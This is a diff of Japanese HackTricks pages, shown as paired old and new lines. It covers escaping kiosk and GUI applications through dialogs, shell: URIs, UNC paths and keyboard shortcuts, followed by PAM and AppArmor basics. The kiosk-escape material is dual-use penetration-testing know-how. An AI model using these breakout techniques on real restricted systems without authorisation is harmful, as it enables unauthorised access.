### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
これはMicrosoftの無料ツールであり、ソフトウェアプロジェクトの設計フェーズで脅威を見つけるのに役立ちます。STRIDEの方法論を使用しており、特にMicrosoftのスタックで開発している人に適しています。
これはMicrosoftからの無料ツールで、ソフトウェアプロジェクトの設計フェーズで脅威を見つけるのに役立ちます。STRIDE方法論を使用し、特にMicrosoftのスタックで開発している人に適しています。
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}

242
hardware-physical-access/escaping-from-gui-applications.md
View file

@ -1,40 +1,54 @@
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を通じて、ゼロからヒーローまでAWSハッキングを学びましょう</summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)を入手する
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**@carlospolopm**をフォローする。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、または**Twitter**で私たちをフォローする 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)。
- **ハッキングテクニックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
# GUIアプリケーション内の可能なアクションをチェック
**Common Dialogs**は、**ファイルの保存**、**ファイルの開く**、フォントの選択、色の選択などのオプションです。ほとんどの場合、これらのオプションにアクセスできる場合、**完全なエクスプローラ機能が提供**されます。
**一般的なダイアログ**は、**ファイルの保存**、**ファイルの開く**、フォントの選択、色の選択などのオプションです。ほとんどの場合、これらのオプションにアクセスできる場合、**完全なエクスプローラ機能**が提供されます。
* 閉じる/閉じるとして
* 開く/開くとして
* 印刷
* エクスポート/インポート
* 検索
* スキャン
これは、次のオプションにアクセスできる場合、エクスプローラ機能にアクセスできることを意味します:
次のことをチェックする必要があります:
- 閉じる/閉じる
- 開く/開くと
- 印刷
- エクスポート/インポート
- 検索
- スキャン
* ファイルを変更または新規作成できるかどうか
* シンボリックリンクを作成できるか
* 制限された領域にアクセスできるか
* 他のアプリを実行できるか
次のことをチェックすべきです:
## コマンド実行
- ファイルの変更または新規作成
- シンボリックリンクの作成
- 制限された領域へのアクセス
- 他のアプリの実行
おそらく**`Open with`**オプションを使用して、いくつかの種類のシェルを開いたり実行したりできるかもしれません。
## コマンドの実行
おそらく**`開くと`**オプションを使用して、ある種のシェルを開いたり実行したりできるかもしれません。
### Windows
@ -48,14 +62,14 @@ _bash、sh、zsh..._ ここで詳細を確認:[https://gtfobins.github.io/](ht
## パス制限のバイパス
* **環境変数**:いくつかのパスを指す環境変数がたくさんあります
* **その他のプロトコル**_about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
* **シンボリックリンク**
* **ショートカット**CTRL+N新しいセッションを開く、CTRL+Rコマンドを実行、CTRL+SHIFT+ESCタスクマネージャー、Windows+Eエクスプローラを開く、CTRL-B、CTRL-Iお気に入り、CTRL-H履歴、CTRL-L、CTRL-Oファイル/開くダイアログ、CTRL-P印刷ダイアログ、CTRL-S名前を付けて保存
* 隠し管理メニューCTRL-ALT-F8、CTRL-ESC-F9
* **シェルURI**_shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
* **UNCパス**共有フォルダに接続するパス。ローカルマシンのC$に接続してみるべきです("\\\127.0.0.1\c$\Windows\System32"
* **その他のUNCパス:**
- **環境変数**:いくつかのパスを指す環境変数がたくさんあります
- **その他のプロトコル**_about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
- **シンボリックリンク**
- **ショートカット**CTRL+N新しいセッションを開く、CTRL+Rコマンドを実行する、CTRL+SHIFT+ESCタスクマネージャー、Windows+Eエクスプローラを開く、CTRL-B、CTRL-Iお気に入り、CTRL-H履歴、CTRL-L、CTRL-Oファイル/開くダイアログ、CTRL-P印刷ダイアログ、CTRL-S名前を付けて保存
- 隠し管理メニューCTRL-ALT-F8、CTRL-ESC-F9
- **シェルURI**_shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
- **UNCパス**共有フォルダに接続するパス。ローカルマシンのC$に接続してみるべきです("\\\127.0.0.1\c$\Windows\System32"
- **その他のUNCパス:**
| UNC | UNC | UNC |
| ------------------------- | -------------- | -------------------- |
@ -89,45 +103,44 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
## ショートカット
* Sticky Keys SHIFTを5回押す
* Mouse Keys SHIFT+ALT+NUMLOCK
* High Contrast SHIFT+ALT+PRINTSCN
* Toggle Keys NUMLOCKを5秒間押し続ける
* Filter Keys 右SHIFTを12秒間押し続ける
* WINDOWS+F1 Windows検索
* WINDOWS+D デスクトップを表示
* WINDOWS+E Windowsエクスプローラを起動
* WINDOWS+R 実行
* WINDOWS+U 利便性センター
* WINDOWS+F 検索
* SHIFT+F10 コンテキストメニュー
* CTRL+SHIFT+ESC タスクマネージャ
* CTRL+ALT+DEL 新しいWindowsバージョンのスプラッシュスクリーン
* F1 ヘルプ F3 検索
* F6 アドレスバー
* F11 Internet Explorer内でのフルスクリーンの切り替え
* CTRL+H Internet Explorerの履歴
* CTRL+T Internet Explorer 新しいタブ
* CTRL+N Internet Explorer 新しいページ
* CTRL+O ファイルを開く
* CTRL+S 保存 CTRL+N 新しいRDP / Citrix
- Sticky Keys SHIFTを5回押す
- Mouse Keys SHIFT+ALT+NUMLOCK
- High Contrast SHIFT+ALT+PRINTSCN
- Toggle Keys NUMLOCKを5秒間押し続ける
- Filter Keys 右SHIFTを12秒間押し続ける
- WINDOWS+F1 Windows検索
- WINDOWS+D デスクトップを表示
- WINDOWS+E Windows Explorerを起動
- WINDOWS+R 実行
- WINDOWS+U 利便性センター
- WINDOWS+F 検索
- SHIFT+F10 コンテキストメニュー
- CTRL+SHIFT+ESC タスクマネージャー
- CTRL+ALT+DEL 新しいWindowsバージョンのスプラッシュスクリーン
- F1 ヘルプ F3 検索
- F6 アドレスバー
- F11 Internet Explorer内でのフルスクリーンの切り替え
- CTRL+H Internet Explorerの履歴
- CTRL+T Internet Explorer 新しいタブ
- CTRL+N Internet Explorer 新しいページ
- CTRL+O ファイルを開く
- CTRL+S 名前を付けて保存 CTRL+N 新しいRDP / Citrix
## スワイプ
* 左端から右にスワイプしてすべての開いているウィンドウを表示し、KIOSKアプリを最小化してOS全体に直接アクセスする
* 右端から左にスワイプしてアクションセンターを開き、KIOSKアプリを最小化してOS全体に直接アクセスする
* 上端からスワイプして、フルスクリーンモードで開いているアプリのタイトルバーを表示する
* 下から上にスワイプして、フルスクリーンアプリでタスクバーを表示する
* 左側から右側にスワイプして、すべての開いているウィンドウを表示し、KIOSKアプリを最小化してOS全体に直接アクセスします。
* 右側から左側にスワイプして、アクションセンターを開き、KIOSKアプリを最小化してOS全体に直接アクセスします。
* 上端からスワイプして、フルスクリーンモードで開かれたアプリのタイトルバーを表示します。
* 下から上にスワイプして、フルスクリーンアプリでタスクバーを表示します。
## Internet Explorerのトリック
### 'Image Toolbar'
画像をクリックすると画像の左上に表示されるツールバー。保存、印刷、メール送信、エクスプローラで「マイピクチャー」を開くなどができます。KioskはInternet Explorerを使用している必要があります。
画像をクリックすると画像の左上に表示されるツールバーです。保存、印刷、メール送信、エクスプローラーで「マイピクチャー」を開くことができます。KioskはInternet Explorerを使用する必要があります。
### シェルプロトコル
これらのURLを入力してエクスプローラビューを取得します
これらのURLを入力してエクスプローラビューを取得します:
* `shell:Administrative Tools`
* `shell:DocumentsLibrary`
@ -153,47 +166,47 @@ Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourcef
## ファイル拡張子の表示
詳細はこちら[https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
詳細については、このページをチェックしてください[https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
# ブラウザのトリック
iKatのバックアップバージョン:
iKatのバージョンをバックアップします
[http://swin.es/k/](http://swin.es/k/)\
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
JavaScriptを使用して共通のダイアログを作成し、ファイルエクスプローラにアクセスする:`document.write('<input/type=file>')`
JavaScriptを使用して共通のダイアログを作成し、ファイルエクスプローラーにアクセスします: `document.write('<input/type=file>')`
出典https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
# iPad
## ジェスチャーとボタン
* 4本または5本の指で上にスワイプ/ホームボタンを2回タップマルチタスクビューを表示してアプリを切り替え
* 4本または5本の指で上にスワイプ/ホームボタンを2回タップマルチタスクビューを表示してアプリを切り替えます
* 4本または5本の指で片方向にスワイプ次の/前のアプリに切り替える
* 4本または5本の指で片方向にスワイプ次の/前のアプリに切り替えるため
* 5本の指で画面をつまむ/ホームボタンをタッチ/画面下部から上に素早く1本の指でスワイプ:ホームにアクセス
* 5本の指で画面をつまむ/ホームボタンをタッチ/画面下部から上に向かって1本の指で素早くスワイプ:ホームにアクセス
* 画面下部から1本の指でゆっくり1〜2インチ上にスワイプ:ドックが表示されます
* 画面下部から1-2インチ上に向かって1本の指でゆっくりスワイプ:ドックが表示されます
* 画面上部から1本の指で下にスワイプ通知を表示
* 画面上部から1本の指で下に向かってスワイプ:通知を表示します
* 画面の右上隅から1本の指で下にスワイプiPad Proのコントロールセンターを表示
* 画面の右上隅から1本の指で下にスワイプiPad Proのコントロールセンターを表示します
* 画面の左端から1本の指で1〜2インチスワイプ今日のビューを表示
* 画面の左端から1-2インチの指で1本の指で素早くスワイプ今日のビューを表示します
* 画面の中央から右または左に素早く1本の指でスワイプ次の/前のアプリに切り替え
* 画面の中央から右または左に素早く1本の指でスワイプ次の/前のアプリに切り替えます
* iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + スライドを右まで移動する:電源を切
* iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + スライドを右まで移動する:電源を切ります
* iPadの右上隅にあるOn/**Off**/Sleepボタンを数秒押し続ける + ホームボタン:強制的に電源を切る
* iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + ホームボタンを数秒間押し続ける:強制的に電源を切ります
* iPadの右上隅にあるOn/**Off**/Sleepボタンホームボタンを素早く押す:画面左下にポップアップするスクリーンショットを撮る。両方のボタンを同時に非常に短く押すと、数秒間押し続けるかのように、強制的に電源が切れます。
* iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + ホームボタンを素早く押す:画面左下にポップアップするスクリーンショットを撮影します。両方のボタンを同時に非常に短く押すと、数秒間押し続けるかのようにハードパワーオフが実行されます。
## ショートカット
iPadキーボードまたはUSBキーボードアダプターを持っている必要があります。アプリケーションから脱出するのに役立つショートカットのみがここに表示されます。
iPadキーボードまたはUSBキーボードアダプターを持っている必要があります。アプリケーションからの脱出に役立つショートカットのみをここに表示します。
| キー | 名前 |
| --- | ------------ |
@ -210,7 +223,7 @@ iPadキーボードまたはUSBキーボードアダプターを持っている
### システムショートカット
これらのショートカットは、iPadの視覚設定や音声設定に依存します。
これらのショートカットは、iPadの視覚設定および音声設定に関連しています。
| ショートカット | アクション |
| -------- | ------------------------------------------------------------------------------ |
@ -231,7 +244,84 @@ iPadキーボードまたはUSBキーボードアダプターを持っている
| ⌘H | ホームに移動 |
| ⌘⇧H (Command-Shift-H) | ホームに移動 |
| ⌘ (Space) | Spotlightを開く |
| ⌘⇥ (Command-Tab) | 最後に使用した10個のアプリをリスト表示する |
| ⌘⇥ (Command-Tab) | 最後に使用した10個のアプリをリスト表示 |
| ⌘\~ | 最後のアプリに移動 |
| ⌘⇧3 (Command-Shift-3) | スクリーンショット(左下にホバーして保存または操作) |
| ⌘
| ⌘⇧4 | スクリーンショットを撮影してエディタで開く |
| ⌘を押し続ける | アプリ用の利用可能なショートカットのリスト |
| ⌘⌥D (Command-Option/Alt-D) | ドックを表示 |
| ^⌥H (Control-Option-H) | ホームボタン |
| ^⌥H H (Control-Option-H-H) | マルチタスクバーを表示 |
| ^⌥I (Control-Option-i) | アイテム選択 |
| Escape | 戻るボタン |
| → (右矢印) | 次のアイテム |
| ← (左矢印) | 前のアイテム |
| ↑↓ (上矢印、下矢印) | 選択したアイテムを同時にタップ |
| ⌥ ↓ (Option-下矢印) | 下にスクロール |
| ⌥↑ (Option-上矢印) | 上にスクロール |
| ⌥← または ⌥→ (Option-左矢印またはOption-右矢印) | 左または右にスクロール |
| ^⌥S (Control-Option-S) | VoiceOverスピーチをオンまたはオフにする |
| ⌘⇧⇥ (Command-Shift-Tab) | 前のアプリに切り替える |
| ⌘⇥ (Command-Tab) | 元のアプリに戻る |
| ←+→、次にOption + ← またはOption+→ | ドックを通じてナビゲートする |
### Safariのショートカット
| ショートカット | アクション |
| ----------------------- | ----------------------------------- |
| ⌘L (Command-L) | ロケーションを開く |
| ⌘T | 新しいタブを開く |
| ⌘W | 現在のタブを閉じる |
| ⌘R | 現在のタブを更新 |
| ⌘. | 現在のタブの読み込みを停止 |
| ^⇥ | 次のタブに切り替え |
| ^⇧⇥ (Control-Shift-Tab) | 前のタブに移動 |
| ⌘L | テキスト入力/URLフィールドを選択して修正 |
| ⌘⇧T (Command-Shift-T) | 最後に閉じたタブを開く(複数回使用可能) |
| ⌘\[ | ブラウジング履歴で1ページ戻る |
| ⌘] | ブラウジング履歴で1ページ進む |
| ⌘⇧R | リーダーモードをアクティブにする |
### メールのショートカット
| ショートカット | アクション |
| -------------------------- | ---------------------- |
| ⌘L | ロケーションを開く |
| ⌘T | 新しいタブを開く |
| ⌘W | 現在のタブを閉じる |
| ⌘R | 現在のタブを更新 |
| ⌘. | 現在のタブの読み込みを停止 |
| ⌘⌥F (Command-Option/Alt-F) | メールボックス内を検索 |
# 参考文献
* [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
* [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
* [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/)
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**でAWSハッキングをゼロからヒーローまで学ぶ</summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

67
linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
View file

@ -6,23 +6,36 @@ HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**https://github.com/carlospolop/hacktricks[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
- **ハッキングトリックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 基本情報
**PAMPluggable Authentication Modules**は、**コンピューターサービスにアクセスしようとするユーザーの身元を確認**し、さまざまな基準に基づいてアクセスを制御するセキュリティメカニズムとして機能します。これはデジタルの門番のようなものであり、特定のサービスにのみ認証されたユーザーが関わることを確認し、システムの過負荷を防ぐために使用を制限する可能性があります。
**PAMPluggable Authentication Modules**は、コンピューターサービスにアクセスしようとするユーザーの身元を**検証**し、さまざまな基準に基づいてアクセスを制御するセキュリティメカニズムとして機能します。これはデジタルの門番のようなものであり、特定のサービスにのみ認証されたユーザーが関わることを確認し、システムの過負荷を防ぐために彼らの使用を制限する可能性があります。
### 構成ファイル
### 設定ファイル
- **SolarisおよびUNIXベースのシステム**は通常、`/etc/pam.conf`にある中央の構成ファイルを使用します。
- **Linuxシステム**はディレクトリアプローチを好み、サービス固有の構成を`/etc/pam.d`内に保存します。たとえば、ログインサービスの構成ファイルは`/etc/pam.d/login`にあります。
- **SolarisおよびUNIXベースのシステム**は通常、`/etc/pam.conf`にある中央の設定ファイルを使用します。
- **Linuxシステム**はディレクトリアプローチを好み、サービス固有の設定を`/etc/pam.d`内に保存します。たとえば、ログインサービスの設定ファイルは`/etc/pam.d/login`にあります。
ログインサービスのPAM構成の例は次のようになります
ログインサービスのPAM設定の例は次のようになります:
```text
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
@ -37,25 +50,53 @@ session required /lib/security/pam_unix_session.so
```
### **PAM管理領域**
これらの領域、または管理グループには、**auth**、**account**、**password**、**session**が含まれ、それぞれ認証およびセッション管理プロセスの異なる側面に責任を持ちます:
これらの領域、または管理グループには、**auth**、**account**、**password**、**session**が含まれます。それぞれが認証およびセッション管理プロセスの異なる側面に責任を持ちます:
- **Auth**: ユーザーのアイデンティティを検証し、しばしばパスワードの入力を求めます。
- **Account**: アカウントの検証を処理し、グループメンバーシップや特定の時間帯の制限などの条件をチェックします。
- **Account**: アカウントの検証を処理し、グループメンバーシップや特定の時間帯の制限などの条件をチェックします。
- **Password**: 複雑さのチェックや辞書攻撃の防止など、パスワードの更新を管理します。
- **Session**: サービスセッションの開始や終了時にアクションを管理し、ディレクトリのマウントやリソース制限の設定などを行います。
### **PAMモジュールの制御**
制御は、モジュールの成功または失敗に対する応答を規定し、全体的な認証プロセスに影響を与えます。これには次のものが含まれます:
制御は、モジュールの成功または失敗に対する応答を決定し、全体的な認証プロセスに影響を与えます。これには以下が含まれます:
- **Required**: 必須モジュールの失敗は最終的に失敗につながりますが、すべての後続モジュールがチェックされた後にのみ失敗します。
- **Requisite**: 失敗時にプロセスが直ちに終了します。
- **Sufficient**: 成功すると、後続のモジュールが失敗しない限り、同じ領域のチェックがバイパスされます。
- **Sufficient**: 成功すると、後続のモジュールが失敗しない限り、同じ領域のチェックをバイパスします。
- **Optional**: スタック内で唯一のモジュールである場合にのみ失敗の原因となります。
### シナリオ例
複数の認証モジュールが設定されている場合、プロセスは厳密な順序に従います。`pam_securetty`モジュールがログイン端末を認証できないと判断した場合、rootログインがブロックされますが、その「必須」ステータスのため、すべてのモジュールが処理されます。`pam_env`は環境変数を設定し、ユーザーエクスペリエンスの向上に役立ちます。`pam_ldap`および`pam_unix`モジュールはユーザーの認証に協力し、`pam_unix`は以前に提供されたパスワードを使用しようとします。これにより、認証方法の効率性と柔軟性が向上します。
複数の認証モジュールが設定されている場合、プロセスは厳密な順序に従います。`pam_securetty`モジュールがログイン端末を認証できないと判断した場合、rootログインがブロックされますが、その後もすべてのモジュールが処理されます。`pam_env`は環境変数を設定し、ユーザーエクスペリエンスの向上に役立ちます。`pam_ldap`および`pam_unix`モジュールはユーザーの認証に協力し、`pam_unix`は以前に提供されたパスワードを使用しようとします。これにより、認証方法の効率性と柔軟性が向上します。
## 参考文献
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトを訪れて、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
HackTricksをサポートする他の方法
* **HackTricksの広告を掲載したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**してください。
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出することで、あなたのハッキングトリックを共有してください。
</details>

100
linux-hardening/privilege-escalation/docker-security/apparmor.md
View file

@ -6,36 +6,50 @@
HackTricks をサポートする他の方法:
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 で私をフォローする [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
* [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スティーラーマルウェア**によって**侵害**されているかどうかをチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 基本情報
AppArmor は、**プログラムごとのプロファイルを介してプログラムが利用できるリソースを制限するように設計されたカーネルの拡張機能**であり、アクセス制御属性をユーザーではなくプログラムに直接結びつけることで、強制アクセス制御MACを効果的に実装します。このシステムは、**プロファイルをカーネルにロード**して動作し、これらのプロファイルは、ネットワーク接続、RAWソケットアクセス、ファイルアクセスなど、プログラムがアクセスできるリソースを指示します。
AppArmor は、**プログラムごとのプロファイルを介してプログラムが利用できるリソースを制限するように設計されたカーネルの拡張機能**であり、アクセス制御属性をユーザーではなくプログラムに直接結びつけることで、強制アクセス制御MACを効果的に実装しています。このシステムは、**プロファイルをカーネルにロード**して動作し、これらのプロファイルは、ネットワーク接続、生のソケットアクセス、ファイルアクセスなど、プログラムがアクセスできるリソースを指示します。
AppArmor プロファイルには、次の2つの動作モードがあります:
AppArmor プロファイルには、次の2つの動作モードがあります
- **強制モード**: このモードは、プロファイルで定義されたポリシーを積極的に強制し、これらのポリシーに違反するアクションをブロックし、syslog や auditd などのシステムを介してこれらを侵害しようとする試みを記録します。
- **クレームモード**: 強制モードとは異なり、クレームモードはプロファイルのポリシーに違反するアクションをブロックしません。代わりに、これらの試みをポリシー違反として記録し、制限を強制しません。
- **強制モード**このモードは、プロファイルで定義されたポリシーを積極的に強制し、これらのポリシーに違反するアクションをブロックし、syslog や auditd などのシステムを介してこれらを侵害しようとする試みを記録します。
- **クレームモード**強制モードとは異なり、クレームモードはプロファイルのポリシーに違反するアクションをブロックしません。代わりに、これらの試みをポリシー違反としてログに記録しますが、制限を強制しません。
### AppArmor の構成要素
- **カーネルモジュール**: ポリシーの強制を担当します。
- **ポリシー**: プログラムの動作とリソースアクセスのルールと制限を指定します。
- **パーサー**: ポリシーをカーネルにロードして強制または報告します。
- **ユーティリティ**: AppArmor とのやり取りと管理のためのインターフェースを提供するユーザーモードプログラムです。
- **カーネルモジュール**ポリシーの強制を担当します。
